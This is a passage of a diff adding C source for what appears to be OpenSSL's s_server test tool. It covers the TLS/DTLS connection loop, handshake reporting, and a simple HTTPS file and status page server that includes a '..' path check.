+    }
+#endif
+
+    if (con == NULL) {
+        con = SSL_new(ctx);
+#ifndef OPENSSL_NO_TLSEXT
+        if (s_tlsextdebug) {
+            SSL_set_tlsext_debug_callback(con, tlsext_cb);
+            SSL_set_tlsext_debug_arg(con, bio_s_out);
+        }
+        if (s_tlsextstatus) {
+            SSL_CTX_set_tlsext_status_cb(ctx, cert_status_cb);
+            tlscstatp.err = bio_err;
+            SSL_CTX_set_tlsext_status_arg(ctx, &tlscstatp);
+        }
+#endif
+#ifndef OPENSSL_NO_KRB5
+        if ((kctx = kssl_ctx_new()) != NULL) {
+            SSL_set0_kssl_ctx(con, kctx);
+            kssl_ctx_setstring(kctx, KSSL_SERVICE, KRB5SVC);
+            kssl_ctx_setstring(kctx, KSSL_KEYTAB, KRB5KEYTAB);
+        }
+#endif                          /* OPENSSL_NO_KRB5 */
+        if (context)
+            SSL_set_session_id_context(con, context, strlen((char *)context));
+    }
+    SSL_clear(con);
+#if 0
+# ifdef TLSEXT_TYPE_opaque_prf_input
+    SSL_set_tlsext_opaque_prf_input(con, "Test server", 11);
+# endif
+#endif
+
+    if (stype == SOCK_DGRAM) {
+
+        sbio = BIO_new_dgram(s, BIO_NOCLOSE);
+
+        if (enable_timeouts) {
+            timeout.tv_sec = 0;
+            timeout.tv_usec = DGRAM_RCV_TIMEOUT;
+            BIO_ctrl(sbio, BIO_CTRL_DGRAM_SET_RECV_TIMEOUT, 0, &timeout);
+
+            timeout.tv_sec = 0;
+            timeout.tv_usec = DGRAM_SND_TIMEOUT;
+            BIO_ctrl(sbio, BIO_CTRL_DGRAM_SET_SEND_TIMEOUT, 0, &timeout);
+        }
+
+        if (socket_mtu) {
+            if (socket_mtu < DTLS_get_link_min_mtu(con)) {
+                BIO_printf(bio_err, "MTU too small. Must be at least %ld\n",
+                           DTLS_get_link_min_mtu(con));
+                ret = -1;
+                BIO_free(sbio);
+                goto err;
+            }
+            SSL_set_options(con, SSL_OP_NO_QUERY_MTU);
+            if (!DTLS_set_link_mtu(con, socket_mtu)) {
+                BIO_printf(bio_err, "Failed to set MTU\n");
+                ret = -1;
+                BIO_free(sbio);
+                goto err;
+            }
+        } else
+            /* want to do MTU discovery */
+            BIO_ctrl(sbio, BIO_CTRL_DGRAM_MTU_DISCOVER, 0, NULL);
+
+        /* turn on cookie exchange */
+        SSL_set_options(con, SSL_OP_COOKIE_EXCHANGE);
+    } else
+        sbio = BIO_new_socket(s, BIO_NOCLOSE);
+
+    if (s_nbio_test) {
+        BIO *test;
+
+        test = BIO_new(BIO_f_nbio_test());
+        sbio = BIO_push(test, sbio);
+    }
+#ifndef OPENSSL_NO_JPAKE
+    if (jpake_secret)
+        jpake_server_auth(bio_s_out, sbio, jpake_secret);
+#endif
+
+    SSL_set_bio(con, sbio, sbio);
+    SSL_set_accept_state(con);
+    /* SSL_set_fd(con,s); */
+
+    if (s_debug) {
+        SSL_set_debug(con, 1);
+        BIO_set_callback(SSL_get_rbio(con), bio_dump_callback);
+        BIO_set_callback_arg(SSL_get_rbio(con), (char *)bio_s_out);
+    }
+    if (s_msg) {
+#ifndef OPENSSL_NO_SSL_TRACE
+        if (s_msg == 2)
+            SSL_set_msg_callback(con, SSL_trace);
+        else
+#endif
+            SSL_set_msg_callback(con, msg_cb);
+        SSL_set_msg_callback_arg(con, bio_s_msg ? bio_s_msg : bio_s_out);
+    }
+#ifndef OPENSSL_NO_TLSEXT
+    if (s_tlsextdebug) {
+        SSL_set_tlsext_debug_callback(con, tlsext_cb);
+        SSL_set_tlsext_debug_arg(con, bio_s_out);
+    }
+#endif
+
+    width = s + 1;
+    for (;;) {
+        int read_from_terminal;
+        int read_from_sslcon;
+
+        read_from_terminal = 0;
+        read_from_sslcon = SSL_pending(con);
+
+        if (!read_from_sslcon) {
+            FD_ZERO(&readfds);
+#if !defined(OPENSSL_SYS_WINDOWS) && !defined(OPENSSL_SYS_MSDOS) && !defined(OPENSSL_SYS_NETWARE) && !defined(OPENSSL_SYS_BEOS_R5)
+            openssl_fdset(fileno(stdin), &readfds);
+#endif
+            openssl_fdset(s, &readfds);
+            /*
+             * Note: under VMS with SOCKETSHR the second parameter is
+             * currently of type (int *) whereas under other systems it is
+             * (void *) if you don't have a cast it will choke the compiler:
+             * if you do have a cast then you can either go for (int *) or
+             * (void *).
+             */
+#if defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_MSDOS) || defined(OPENSSL_SYS_NETWARE)
+            /*
+             * Under DOS (non-djgpp) and Windows we can't select on stdin:
+             * only on sockets. As a workaround we timeout the select every
+             * second and check for any keypress. In a proper Windows
+             * application we wouldn't do this because it is inefficient.
+             */
+            tv.tv_sec = 1;
+            tv.tv_usec = 0;
+            i = select(width, (void *)&readfds, NULL, NULL, &tv);
+            if ((i < 0) || (!i && !_kbhit()))
+                continue;
+            if (_kbhit())
+                read_from_terminal = 1;
+#elif defined(OPENSSL_SYS_BEOS_R5)
+            /* Under BeOS-R5 the situation is similar to DOS */
+            tv.tv_sec = 1;
+            tv.tv_usec = 0;
+            (void)fcntl(fileno(stdin), F_SETFL, O_NONBLOCK);
+            i = select(width, (void *)&readfds, NULL, NULL, &tv);
+            if ((i < 0) || (!i && read(fileno(stdin), buf, 0) < 0))
+                continue;
+            if (read(fileno(stdin), buf, 0) >= 0)
+                read_from_terminal = 1;
+            (void)fcntl(fileno(stdin), F_SETFL, 0);
+#else
+            if ((SSL_version(con) == DTLS1_VERSION) &&
+                DTLSv1_get_timeout(con, &timeout))
+                timeoutp = &timeout;
+            else
+                timeoutp = NULL;
+
+            i = select(width, (void *)&readfds, NULL, NULL, timeoutp);
+
+            if ((SSL_version(con) == DTLS1_VERSION)
+                && DTLSv1_handle_timeout(con) > 0) {
+                BIO_printf(bio_err, "TIMEOUT occured\n");
+            }
+
+            if (i <= 0)
+                continue;
+            if (FD_ISSET(fileno(stdin), &readfds))
+                read_from_terminal = 1;
+#endif
+            if (FD_ISSET(s, &readfds))
+                read_from_sslcon = 1;
+        }
+        if (read_from_terminal) {
+            if (s_crlf) {
+                int j, lf_num;
+
+                i = raw_read_stdin(buf, bufsize / 2);
+                lf_num = 0;
+                /* both loops are skipped when i <= 0 */
+                for (j = 0; j < i; j++)
+                    if (buf[j] == '\n')
+                        lf_num++;
+                for (j = i - 1; j >= 0; j--) {
+                    buf[j + lf_num] = buf[j];
+                    if (buf[j] == '\n') {
+                        lf_num--;
+                        i++;
+                        buf[j + lf_num] = '\r';
+                    }
+                }
+                assert(lf_num == 0);
+            } else
+                i = raw_read_stdin(buf, bufsize);
+            if (!s_quiet && !s_brief) {
+                if ((i <= 0) || (buf[0] == 'Q')) {
+                    BIO_printf(bio_s_out, "DONE\n");
+                    SHUTDOWN(s);
+                    close_accept_socket();
+                    ret = -11;
+                    goto err;
+                }
+                if ((i <= 0) || (buf[0] == 'q')) {
+                    BIO_printf(bio_s_out, "DONE\n");
+                    if (SSL_version(con) != DTLS1_VERSION)
+                        SHUTDOWN(s);
+                    /*
+                     * close_accept_socket(); ret= -11;
+                     */
+                    goto err;
+                }
+#ifndef OPENSSL_NO_HEARTBEATS
+                if ((buf[0] == 'B') && ((buf[1] == '\n') || (buf[1] == '\r'))) {
+                    BIO_printf(bio_err, "HEARTBEATING\n");
+                    SSL_heartbeat(con);
+                    i = 0;
+                    continue;
+                }
+#endif
+                if ((buf[0] == 'r') && ((buf[1] == '\n') || (buf[1] == '\r'))) {
+                    SSL_renegotiate(con);
+                    i = SSL_do_handshake(con);
+                    printf("SSL_do_handshake -> %d\n", i);
+                    i = 0;      /* 13; */
+                    continue;
+                    /*
+                     * strcpy(buf,"server side RE-NEGOTIATE\n");
+                     */
+                }
+                if ((buf[0] == 'R') && ((buf[1] == '\n') || (buf[1] == '\r'))) {
+                    SSL_set_verify(con,
+                                   SSL_VERIFY_PEER | SSL_VERIFY_CLIENT_ONCE,
+                                   NULL);
+                    SSL_renegotiate(con);
+                    i = SSL_do_handshake(con);
+                    printf("SSL_do_handshake -> %d\n", i);
+                    i = 0;      /* 13; */
+                    continue;
+                    /*
+                     * strcpy(buf,"server side RE-NEGOTIATE asking for client
+                     * cert\n");
+                     */
+                }
+                if (buf[0] == 'P') {
+                    static const char *str = "Lets print some clear text\n";
+                    BIO_write(SSL_get_wbio(con), str, strlen(str));
+                }
+                if (buf[0] == 'S') {
+                    print_stats(bio_s_out, SSL_get_SSL_CTX(con));
+                }
+            }
+#ifdef CHARSET_EBCDIC
+            ebcdic2ascii(buf, buf, i);
+#endif
+            l = k = 0;
+            for (;;) {
+                /* should do a select for the write */
+#ifdef RENEG
+                {
+                    static count = 0;
+                    if (++count == 100) {
+                        count = 0;
+                        SSL_renegotiate(con);
+                    }
+                }
+#endif
+                k = SSL_write(con, &(buf[l]), (unsigned int)i);
+#ifndef OPENSSL_NO_SRP
+                while (SSL_get_error(con, k) == SSL_ERROR_WANT_X509_LOOKUP) {
+                    BIO_printf(bio_s_out, "LOOKUP renego during write\n");
+                    srp_callback_parm.user =
+                        SRP_VBASE_get_by_user(srp_callback_parm.vb,
+                                              srp_callback_parm.login);
+                    if (srp_callback_parm.user)
+                        BIO_printf(bio_s_out, "LOOKUP done %s\n",
+                                   srp_callback_parm.user->info);
+                    else
+                        BIO_printf(bio_s_out, "LOOKUP not successful\n");
+                    k = SSL_write(con, &(buf[l]), (unsigned int)i);
+                }
+#endif
+                switch (SSL_get_error(con, k)) {
+                case SSL_ERROR_NONE:
+                    break;
+                case SSL_ERROR_WANT_WRITE:
+                case SSL_ERROR_WANT_READ:
+                case SSL_ERROR_WANT_X509_LOOKUP:
+                    BIO_printf(bio_s_out, "Write BLOCK\n");
+                    break;
+                case SSL_ERROR_SYSCALL:
+                case SSL_ERROR_SSL:
+                    BIO_printf(bio_s_out, "ERROR\n");
+                    ERR_print_errors(bio_err);
+                    ret = 1;
+                    goto err;
+                    /* break; */
+                case SSL_ERROR_ZERO_RETURN:
+                    BIO_printf(bio_s_out, "DONE\n");
+                    ret = 1;
+                    goto err;
+                }
+                l += k;
+                i -= k;
+                if (i <= 0)
+                    break;
+            }
+        }
+        if (read_from_sslcon) {
+            if (!SSL_is_init_finished(con)) {
+                i = init_ssl_connection(con);
+
+                if (i < 0) {
+                    ret = 0;
+                    goto err;
+                } else if (i == 0) {
+                    ret = 1;
+                    goto err;
+                }
+            } else {
+ again:
+                i = SSL_read(con, (char *)buf, bufsize);
+#ifndef OPENSSL_NO_SRP
+                while (SSL_get_error(con, i) == SSL_ERROR_WANT_X509_LOOKUP) {
+                    BIO_printf(bio_s_out, "LOOKUP renego during read\n");
+                    srp_callback_parm.user =
+                        SRP_VBASE_get_by_user(srp_callback_parm.vb,
+                                              srp_callback_parm.login);
+                    if (srp_callback_parm.user)
+                        BIO_printf(bio_s_out, "LOOKUP done %s\n",
+                                   srp_callback_parm.user->info);
+                    else
+                        BIO_printf(bio_s_out, "LOOKUP not successful\n");
+                    i = SSL_read(con, (char *)buf, bufsize);
+                }
+#endif
+                switch (SSL_get_error(con, i)) {
+                case SSL_ERROR_NONE:
+#ifdef CHARSET_EBCDIC
+                    ascii2ebcdic(buf, buf, i);
+#endif
+                    raw_write_stdout(buf, (unsigned int)i);
+                    if (SSL_pending(con))
+                        goto again;
+                    break;
+                case SSL_ERROR_WANT_WRITE:
+                case SSL_ERROR_WANT_READ:
+                    BIO_printf(bio_s_out, "Read BLOCK\n");
+                    break;
+                case SSL_ERROR_SYSCALL:
+                case SSL_ERROR_SSL:
+                    BIO_printf(bio_s_out, "ERROR\n");
+                    ERR_print_errors(bio_err);
+                    ret = 1;
+                    goto err;
+                case SSL_ERROR_ZERO_RETURN:
+                    BIO_printf(bio_s_out, "DONE\n");
+                    ret = 1;
+                    goto err;
+                }
+            }
+        }
+    }
+ err:
+    if (con != NULL) {
+        BIO_printf(bio_s_out, "shutting down SSL\n");
+#if 1
+        SSL_set_shutdown(con, SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN);
+#else
+        SSL_shutdown(con);
+#endif
+        SSL_free(con);
+    }
+    BIO_printf(bio_s_out, "CONNECTION CLOSED\n");
+    if (buf != NULL) {
+        OPENSSL_cleanse(buf, bufsize);
+        OPENSSL_free(buf);
+    }
+    if (ret >= 0)
+        BIO_printf(bio_s_out, "ACCEPT\n");
+    return (ret);
+}
+
+static void close_accept_socket(void)
+{
+    BIO_printf(bio_err, "shutdown accept socket\n");
+    if (accept_socket >= 0) {
+        SHUTDOWN2(accept_socket);
+    }
+}
+
+static int init_ssl_connection(SSL *con)
+{
+    int i;
+    const char *str;
+    X509 *peer;
+    long verify_error;
+    MS_STATIC char buf[BUFSIZ];
+#ifndef OPENSSL_NO_KRB5
+    char *client_princ;
+#endif
+#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
+    const unsigned char *next_proto_neg;
+    unsigned next_proto_neg_len;
+#endif
+    unsigned char *exportedkeymat;
+
+    i = SSL_accept(con);
+#ifdef CERT_CB_TEST_RETRY
+    {
+        while (i <= 0 && SSL_get_error(con, i) == SSL_ERROR_WANT_X509_LOOKUP
+               && SSL_state(con) == SSL3_ST_SR_CLNT_HELLO_C) {
+            fprintf(stderr,
+                    "LOOKUP from certificate callback during accept\n");
+            i = SSL_accept(con);
+        }
+    }
+#endif
+#ifndef OPENSSL_NO_SRP
+    while (i <= 0 && SSL_get_error(con, i) == SSL_ERROR_WANT_X509_LOOKUP) {
+        BIO_printf(bio_s_out, "LOOKUP during accept %s\n",
+                   srp_callback_parm.login);
+        srp_callback_parm.user =
+            SRP_VBASE_get_by_user(srp_callback_parm.vb,
+                                  srp_callback_parm.login);
+        if (srp_callback_parm.user)
+            BIO_printf(bio_s_out, "LOOKUP done %s\n",
+                       srp_callback_parm.user->info);
+        else
+            BIO_printf(bio_s_out, "LOOKUP not successful\n");
+        i = SSL_accept(con);
+    }
+#endif
+
+    if (i <= 0) {
+        if (BIO_sock_should_retry(i)) {
+            BIO_printf(bio_s_out, "DELAY\n");
+            return (1);
+        }
+
+        BIO_printf(bio_err, "ERROR\n");
+        verify_error = SSL_get_verify_result(con);
+        if (verify_error != X509_V_OK) {
+            BIO_printf(bio_err, "verify error:%s\n",
+                       X509_verify_cert_error_string(verify_error));
+        }
+        /* Always print any error messages */
+        ERR_print_errors(bio_err);
+        return (0);
+    }
+
+    if (s_brief)
+        print_ssl_summary(bio_err, con);
+
+    PEM_write_bio_SSL_SESSION(bio_s_out, SSL_get_session(con));
+
+    peer = SSL_get_peer_certificate(con);
+    if (peer != NULL) {
+        BIO_printf(bio_s_out, "Client certificate\n");
+        PEM_write_bio_X509(bio_s_out, peer);
+        X509_NAME_oneline(X509_get_subject_name(peer), buf, sizeof buf);
+        BIO_printf(bio_s_out, "subject=%s\n", buf);
+        X509_NAME_oneline(X509_get_issuer_name(peer), buf, sizeof buf);
+        BIO_printf(bio_s_out, "issuer=%s\n", buf);
+        X509_free(peer);
+    }
+
+    if (SSL_get_shared_ciphers(con, buf, sizeof buf) != NULL)
+        BIO_printf(bio_s_out, "Shared ciphers:%s\n", buf);
+    str = SSL_CIPHER_get_name(SSL_get_current_cipher(con));
+    ssl_print_sigalgs(bio_s_out, con);
+#ifndef OPENSSL_NO_EC
+    ssl_print_point_formats(bio_s_out, con);
+    ssl_print_curves(bio_s_out, con, 0);
+#endif
+    BIO_printf(bio_s_out, "CIPHER is %s\n", (str != NULL) ? str : "(NONE)");
+
+#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
+    SSL_get0_next_proto_negotiated(con, &next_proto_neg, &next_proto_neg_len);
+    if (next_proto_neg) {
+        BIO_printf(bio_s_out, "NEXTPROTO is ");
+        BIO_write(bio_s_out, next_proto_neg, next_proto_neg_len);
+        BIO_printf(bio_s_out, "\n");
+    }
+#endif
+#ifndef OPENSSL_NO_SRTP
+    {
+        SRTP_PROTECTION_PROFILE *srtp_profile
+            = SSL_get_selected_srtp_profile(con);
+
+        if (srtp_profile)
+            BIO_printf(bio_s_out, "SRTP Extension negotiated, profile=%s\n",
+                       srtp_profile->name);
+    }
+#endif
+    if (SSL_cache_hit(con))
+        BIO_printf(bio_s_out, "Reused session-id\n");
+    if (SSL_ctrl(con, SSL_CTRL_GET_FLAGS, 0, NULL) &
+        TLS1_FLAGS_TLS_PADDING_BUG)
+        BIO_printf(bio_s_out, "Peer has incorrect TLSv1 block padding\n");
+#ifndef OPENSSL_NO_KRB5
+    client_princ = kssl_ctx_get0_client_princ(SSL_get0_kssl_ctx(con));
+    if (client_princ != NULL) {
+        BIO_printf(bio_s_out, "Kerberos peer principal is %s\n",
+                   client_princ);
+    }
+#endif                          /* OPENSSL_NO_KRB5 */
+    BIO_printf(bio_s_out, "Secure Renegotiation IS%s supported\n",
+               SSL_get_secure_renegotiation_support(con) ? "" : " NOT");
+    if (keymatexportlabel != NULL) {
+        BIO_printf(bio_s_out, "Keying material exporter:\n");
+        BIO_printf(bio_s_out, "    Label: '%s'\n", keymatexportlabel);
+        BIO_printf(bio_s_out, "    Length: %i bytes\n", keymatexportlen);
+        exportedkeymat = OPENSSL_malloc(keymatexportlen);
+        if (exportedkeymat != NULL) {
+            if (!SSL_export_keying_material(con, exportedkeymat,
+                                            keymatexportlen,
+                                            keymatexportlabel,
+                                            strlen(keymatexportlabel),
+                                            NULL, 0, 0)) {
+                BIO_printf(bio_s_out, "    Error\n");
+            } else {
+                BIO_printf(bio_s_out, "    Keying material: ");
+                for (i = 0; i < keymatexportlen; i++)
+                    BIO_printf(bio_s_out, "%02X", exportedkeymat[i]);
+                BIO_printf(bio_s_out, "\n");
+            }
+            OPENSSL_free(exportedkeymat);
+        }
+    }
+
+    return (1);
+}
+
+#ifndef OPENSSL_NO_DH
+static DH *load_dh_param(const char *dhfile)
+{
+    DH *ret = NULL;
+    BIO *bio;
+
+    if ((bio = BIO_new_file(dhfile, "r")) == NULL)
+        goto err;
+    ret = PEM_read_bio_DHparams(bio, NULL, NULL, NULL);
+ err:
+    if (bio != NULL)
+        BIO_free(bio);
+    return (ret);
+}
+#endif
+#ifndef OPENSSL_NO_KRB5
+char *client_princ;
+#endif
+
+#if 0
+static int load_CA(SSL_CTX *ctx, char *file)
+{
+    FILE *in;
+    X509 *x = NULL;
+
+    if ((in = fopen(file, "r")) == NULL)
+        return (0);
+
+    for (;;) {
+        if (PEM_read_X509(in, &x, NULL) == NULL)
+            break;
+        SSL_CTX_add_client_CA(ctx, x);
+    }
+    if (x != NULL)
+        X509_free(x);
+    fclose(in);
+    return (1);
+}
+#endif
+
+static int www_body(char *hostname, int s, int stype, unsigned char *context)
+{
+    char *buf = NULL;
+    int ret = 1;
+    int i, j, k, dot;
+    SSL *con;
+    const SSL_CIPHER *c;
+    BIO *io, *ssl_bio, *sbio;
+#ifndef OPENSSL_NO_KRB5
+    KSSL_CTX *kctx;
+#endif
+
+    buf = OPENSSL_malloc(bufsize);
+    if (buf == NULL)
+        return (0);
+    io = BIO_new(BIO_f_buffer());
+    ssl_bio = BIO_new(BIO_f_ssl());
+    if ((io == NULL) || (ssl_bio == NULL))
+        goto err;
+
+#ifdef FIONBIO
+    if (s_nbio) {
+        unsigned long sl = 1;
+
+        if (!s_quiet)
+            BIO_printf(bio_err, "turning on non blocking io\n");
+        if (BIO_socket_ioctl(s, FIONBIO, &sl) < 0)
+            ERR_print_errors(bio_err);
+    }
+#endif
+
+    /* lets make the output buffer a reasonable size */
+    if (!BIO_set_write_buffer_size(io, bufsize))
+        goto err;
+
+    if ((con = SSL_new(ctx)) == NULL)
+        goto err;
+#ifndef OPENSSL_NO_TLSEXT
+    if (s_tlsextdebug) {
+        SSL_set_tlsext_debug_callback(con, tlsext_cb);
+        SSL_set_tlsext_debug_arg(con, bio_s_out);
+    }
+#endif
+#ifndef OPENSSL_NO_KRB5
+    if ((kctx = kssl_ctx_new()) != NULL) {
+        kssl_ctx_setstring(kctx, KSSL_SERVICE, KRB5SVC);
+        kssl_ctx_setstring(kctx, KSSL_KEYTAB, KRB5KEYTAB);
+    }
+#endif                          /* OPENSSL_NO_KRB5 */
+    if (context)
+        SSL_set_session_id_context(con, context, strlen((char *)context));
+
+    sbio = BIO_new_socket(s, BIO_NOCLOSE);
+    if (s_nbio_test) {
+        BIO *test;
+
+        test = BIO_new(BIO_f_nbio_test());
+        sbio = BIO_push(test, sbio);
+    }
+    SSL_set_bio(con, sbio, sbio);
+    SSL_set_accept_state(con);
+
+    /* SSL_set_fd(con,s); */
+    BIO_set_ssl(ssl_bio, con, BIO_CLOSE);
+    BIO_push(io, ssl_bio);
+#ifdef CHARSET_EBCDIC
+    io = BIO_push(BIO_new(BIO_f_ebcdic_filter()), io);
+#endif
+
+    if (s_debug) {
+        SSL_set_debug(con, 1);
+        BIO_set_callback(SSL_get_rbio(con), bio_dump_callback);
+        BIO_set_callback_arg(SSL_get_rbio(con), (char *)bio_s_out);
+    }
+    if (s_msg) {
+#ifndef OPENSSL_NO_SSL_TRACE
+        if (s_msg == 2)
+            SSL_set_msg_callback(con, SSL_trace);
+        else
+#endif
+            SSL_set_msg_callback(con, msg_cb);
+        SSL_set_msg_callback_arg(con, bio_s_msg ? bio_s_msg : bio_s_out);
+    }
+
+    for (;;) {
+        if (hack) {
+            i = SSL_accept(con);
+#ifndef OPENSSL_NO_SRP
+            while (i <= 0
+                   && SSL_get_error(con, i) == SSL_ERROR_WANT_X509_LOOKUP) {
+                BIO_printf(bio_s_out, "LOOKUP during accept %s\n",
+                           srp_callback_parm.login);
+                srp_callback_parm.user =
+                    SRP_VBASE_get_by_user(srp_callback_parm.vb,
+                                          srp_callback_parm.login);
+                if (srp_callback_parm.user)
+                    BIO_printf(bio_s_out, "LOOKUP done %s\n",
+                               srp_callback_parm.user->info);
+                else
+                    BIO_printf(bio_s_out, "LOOKUP not successful\n");
+                i = SSL_accept(con);
+            }
+#endif
+            switch (SSL_get_error(con, i)) {
+            case SSL_ERROR_NONE:
+                break;
+            case SSL_ERROR_WANT_WRITE:
+            case SSL_ERROR_WANT_READ:
+            case SSL_ERROR_WANT_X509_LOOKUP:
+                continue;
+            case SSL_ERROR_SYSCALL:
+            case SSL_ERROR_SSL:
+            case SSL_ERROR_ZERO_RETURN:
+                ret = 1;
+                goto err;
+                /* break; */
+            }
+
+            SSL_renegotiate(con);
+            SSL_write(con, NULL, 0);
+        }
+
+        i = BIO_gets(io, buf, bufsize - 1);
+        if (i < 0) {            /* error */
+            if (!BIO_should_retry(io)) {
+                if (!s_quiet)
+                    ERR_print_errors(bio_err);
+                goto err;
+            } else {
+                BIO_printf(bio_s_out, "read R BLOCK\n");
+#if defined(OPENSSL_SYS_NETWARE)
+                delay(1000);
+#elif !defined(OPENSSL_SYS_MSDOS) && !defined(__DJGPP__)
+                sleep(1);
+#endif
+                continue;
+            }
+        } else if (i == 0) {    /* end of input */
+            ret = 1;
+            goto end;
+        }
+
+        /* else we have data */
+        if (((www == 1) && (strncmp("GET ", buf, 4) == 0)) ||
+            ((www == 2) && (strncmp("GET /stats ", buf, 10) == 0))) {
+            char *p;
+            X509 *peer;
+            STACK_OF(SSL_CIPHER) *sk;
+            static const char *space = "                          ";
+
+            BIO_puts(io,
+                     "HTTP/1.0 200 ok\r\nContent-type: text/html\r\n\r\n");
+            BIO_puts(io, "<HTML><BODY BGCOLOR=\"#ffffff\">\n");
+            BIO_puts(io, "<pre>\n");
+/*                      BIO_puts(io,SSLeay_version(SSLEAY_VERSION));*/
+            BIO_puts(io, "\n");
+            for (i = 0; i < local_argc; i++) {
+                BIO_puts(io, local_argv[i]);
+                BIO_write(io, " ", 1);
+            }
+            BIO_puts(io, "\n");
+
+            BIO_printf(io,
+                       "Secure Renegotiation IS%s supported\n",
+                       SSL_get_secure_renegotiation_support(con) ?
+                       "" : " NOT");
+
+            /*
+             * The following is evil and should not really be done
+             */
+            BIO_printf(io, "Ciphers supported in s_server binary\n");
+            sk = SSL_get_ciphers(con);
+            j = sk_SSL_CIPHER_num(sk);
+            for (i = 0; i < j; i++) {
+                c = sk_SSL_CIPHER_value(sk, i);
+                BIO_printf(io, "%-11s:%-25s",
+                           SSL_CIPHER_get_version(c), SSL_CIPHER_get_name(c));
+                if ((((i + 1) % 2) == 0) && (i + 1 != j))
+                    BIO_puts(io, "\n");
+            }
+            BIO_puts(io, "\n");
+            p = SSL_get_shared_ciphers(con, buf, bufsize);
+            if (p != NULL) {
+                BIO_printf(io,
+                           "---\nCiphers common between both SSL end points:\n");
+                j = i = 0;
+                while (*p) {
+                    if (*p == ':') {
+                        BIO_write(io, space, 26 - j);
+                        i++;
+                        j = 0;
+                        BIO_write(io, ((i % 3) ? " " : "\n"), 1);
+                    } else {
+                        BIO_write(io, p, 1);
+                        j++;
+                    }
+                    p++;
+                }
+                BIO_puts(io, "\n");
+            }
+            ssl_print_sigalgs(io, con);
+#ifndef OPENSSL_NO_EC
+            ssl_print_curves(io, con, 0);
+#endif
+            BIO_printf(io, (SSL_cache_hit(con)
+                            ? "---\nReused, " : "---\nNew, "));
+            c = SSL_get_current_cipher(con);
+            BIO_printf(io, "%s, Cipher is %s\n",
+                       SSL_CIPHER_get_version(c), SSL_CIPHER_get_name(c));
+            SSL_SESSION_print(io, SSL_get_session(con));
+            BIO_printf(io, "---\n");
+            print_stats(io, SSL_get_SSL_CTX(con));
+            BIO_printf(io, "---\n");
+            peer = SSL_get_peer_certificate(con);
+            if (peer != NULL) {
+                BIO_printf(io, "Client certificate\n");
+                X509_print(io, peer);
+                PEM_write_bio_X509(io, peer);
+            } else
+                BIO_puts(io, "no client certificate available\n");
+            BIO_puts(io, "</BODY></HTML>\r\n\r\n");
+            break;
+        } else if ((www == 2 || www == 3)
+                   && (strncmp("GET /", buf, 5) == 0)) {
+            BIO *file;
+            char *p, *e;
+            static const char *text =
+                "HTTP/1.0 200 ok\r\nContent-type: text/plain\r\n\r\n";
+
+            /* skip the '/' */
+            p = &(buf[5]);
+
+            dot = 1;
+            for (e = p; *e != '\0'; e++) {
+                if (e[0] == ' ')
+                    break;
+
+                switch (dot) {
+                case 1:
+                    dot = (e[0] == '.') ? 2 : 0;
+                    break;
+                case 2:
+                    dot = (e[0] == '.') ? 3 : 0;
+                    break;
+                case 3:
+                    dot = (e[0] == '/') ? -1 : 0;
+                    break;
+                }
+                if (dot == 0)
+                    dot = (e[0] == '/') ? 1 : 0;
+            }
+            dot = (dot == 3) || (dot == -1); /* filename contains ".."
+                                              * component */
+
+            if (*e == '\0') {
+                BIO_puts(io, text);
+                BIO_printf(io, "'%s' is an invalid file name\r\n", p);
+                break;
+            }
+            *e = '\0';
+
+            if (dot) {
+                BIO_puts(io, text);
+                BIO_printf(io, "'%s' contains '..' reference\r\n", p);
+                break;
+            }
+
+            if (*p == '/') {
+                BIO_puts(io, text);
+                BIO_printf(io, "'%s' is an invalid path\r\n", p);
+                break;
+            }
+#if 0
+            /* append if a directory lookup */
+            if (e[-1] == '/')
+                strcat(p, "index.html");
+#endif
+
+            /* if a directory, do the index thang */
+            if (app_isdir(p) > 0) {
+#if 0                           /* must check buffer size */
+                strcat(p, "/index.html");
+#else
+                BIO_puts(io, text);
+                BIO_printf(io, "'%s' is a directory\r\n", p);
+                break;
+#endif
+            }
+
+            if ((file = BIO_new_file(p, "r")) == NULL) {
+                BIO_puts(io, text);
+                BIO_printf(io, "Error opening '%s'\r\n", p);
+                ERR_print_errors(io);
+                break;
+            }
+
+            if (!s_quiet)
+                BIO_printf(bio_err, "FILE:%s\n", p);
+
+            if (www == 2) {
+                i = strlen(p);
+                if (((i > 5) && (strcmp(&(p[i - 5]), ".html") == 0)) ||
+                    ((i > 4) && (strcmp(&(p[i - 4]), ".php") == 0)) ||
+                    ((i > 4) && (strcmp(&(p[i - 4]), ".htm") == 0)))
+                    BIO_puts(io,
+                             "HTTP/1.0 200 ok\r\nContent-type: text/html\r\n\r\n");
+                else
+                    BIO_puts(io,
+                             "HTTP/1.0 200 ok\r\nContent-type: text/plain\r\n\r\n");
+            }
+            /* send the file */
+            for (;;) {
+                i = BIO_read(file, buf, bufsize);
+                if (i <= 0)
+                    break;
+
+#ifdef RENEG
+                total_bytes += i;
+                fprintf(stderr, "%d\n", i);
+                if (total_bytes > 3 * 1024) {
+                    total_bytes = 0;
+                    fprintf(stderr, "RENEGOTIATE\n");
+                    SSL_renegotiate(con);
+                }
+#endif
+
+                for (j = 0; j < i;) {
+#ifdef RENEG
+                    {
+                        static count = 0;
+                        if (++count == 13) {
+                            SSL_renegotiate(con);
+                        }
+                    }
+#endif
+                    k = BIO_write(io, &(buf[j]), i - j);
+                    if (k <= 0) {
+                        if (!BIO_should_retry(io))
+                            goto write_error;
+                        else {
+                            BIO_printf(bio_s_out, "rwrite W BLOCK\n");
+                        }
+                    } else {
+                        j += k;
+                    }
+                }
+            }
+ write_error:
+            BIO_free(file);
+            break;
+        }
+    }
+
+    for (;;) {
+        i = (int)BIO_flush(io);
+        if (i <= 0) {
+            if (!BIO_should_retry(io))
+                break;
+        } else
+            break;
+    }
+ end:
+#if 1
+    /* make sure we re-use sessions */
+    SSL_set_shutdown(con, SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN);
+#else
+    /* This kills performance */
+    /*
+     * SSL_shutdown(con); A shutdown gets sent in the BIO_free_all(io)
+     * procession
+     */
+#endif
+
+ err:
+
+    if (ret >= 0)
+        BIO_printf(bio_s_out, "ACCEPT\n");
+
+    if (buf != NULL)
+        OPENSSL_free(buf);
+    if (io != NULL)
+        BIO_free_all(io);
+/*      if (ssl_bio != NULL) BIO_free(ssl_bio);*/
+    return (ret);
+}
+
+static int rev_body(char *hostname, int s, int stype, unsigned char *context)
+{
